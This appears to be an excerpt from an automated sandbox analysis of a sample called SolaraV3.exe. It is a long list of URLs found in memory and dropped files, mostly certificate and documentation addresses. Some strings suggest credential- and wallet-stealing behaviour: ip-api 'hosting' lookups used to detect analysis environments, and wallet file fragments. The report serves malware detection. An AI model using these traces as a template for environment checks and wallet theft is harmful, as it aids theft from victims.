Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _socket.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000001A.00000003.1634045934.000001407C750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.ve
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veANIFE~1JSO
Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veW
Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veWALLET~2.JS
Source: powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr, _hashlib.pyd.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0shtable_get
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: SolaraV3.exe	String found in binary or memory: http://ocsp.sectigo.com0$
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
